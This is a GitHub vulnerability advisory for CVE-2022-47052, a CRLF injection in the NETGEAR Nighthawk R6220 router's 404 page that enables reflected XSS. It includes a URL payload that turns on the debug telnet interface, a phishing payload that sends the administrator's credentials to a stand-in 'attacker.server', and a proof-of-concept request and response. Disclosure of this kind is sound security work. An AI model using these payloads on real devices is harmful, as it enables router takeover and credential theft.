Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
NETGEAR/CVE-2022-47052/
NETGEAR/CVE-2022-47052/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

Response Splitting via CRLF

Description

CRLF (Carriage Return Line Feed) Injection CWE-93: https://cwe.mitre.org/data/definitions/93.html

Response splitting via Carriage Return Line Feed (CRLF) is a vulnerability that exploits the way HTTP headers parse certain characters such as \rand \n. Appending these characters to HTTP headers can allow the insertion of payloads into a header which can result in the manipulation of cookies, server information, and status codes.

Type: Unauthenticated Remote attack

Tested on firmware version: V1.1.0.112_1.0.1, V1.1.0.114_1.0.1

Details

The web interface of the 'Nighthawk R6220 AC1200 Smart Wi-Fi Router' is vulnerable to a CRLF Injection attack that can be leveraged to perform Reflected XSS and HTML Injection.

This issue affects the custom 404 page that is served when a request is issued for a page that does not exist. By leveraging this vulnerability, an unauthenticated remote attacker is able to inject arbitrary HTML and JavaScript code to be executed in a user's browser.

Impact

A malicious attacker can exploit this vulnerability using a specially crafted URL. If this URL is opened by an administrator, the attacker can achieve the following:

  1. Perform actions on the administrative portion of the web application
  • Example payload that enables the debug telnet interface: https://192.168.1.1/666%0A%0A%3Cscript%3Edocument.location=%22https://192.168.1.1/setup.cgi?todo=debug%22;%3C/script%3E
  1. Obtain the administrator's credentials through phishing
  • Example phishing payload: https://192.168.1.1/123%0A%0A%3Cscript>var name=prompt("Username");var pass=prompt("Password");document.location="http://attacker.server/?user="+name+"?pass="+pass;</script>

Note that if another vulnerability is presented in the administrative portal such as a Remote Command Execution (RCE), an attacker can use a specially crafted URL and chain the two vulnerabilities to create a one-click exploit.

Evidence

The request consists of a resource that does not exist ("xsstesty") followed by Line-Feed characters (%0A%0A) and the JavaScript payload.

Request

GET /xsstesty%0A%0A%3Cscript%3Ealert('xss');%3C/script%3E 
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: sessionid=sid17289xxx158005xxx1087458037
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

Note that the HTTP response headers are embedded directly into the 404 page response body and the payload is executed on the victim's browser.

Response Body

<script>alert('xss');</script> HTTP/1.1 404 Not Found
Server: 
Date: Fri, 02 Jan 1970 02:44:27 GMT
Content-Type: text/html
P3P: 443
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1;mode=block
X-Content-Type-Options: nosniff
Connection: close

        <HTML>
        <HEAD><TITLE>404 Not Found</TITLE></HEAD>
        <BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
        <H4>404 Not Found</H4>
File not found.
</BODY>
</HTML>

Remediation

Sanitize and neutralize all user-supplied data or properly encode output in HTTP headers that would otherwise be visible to users in order to prevent the injection of CRLF sequences and their consequences.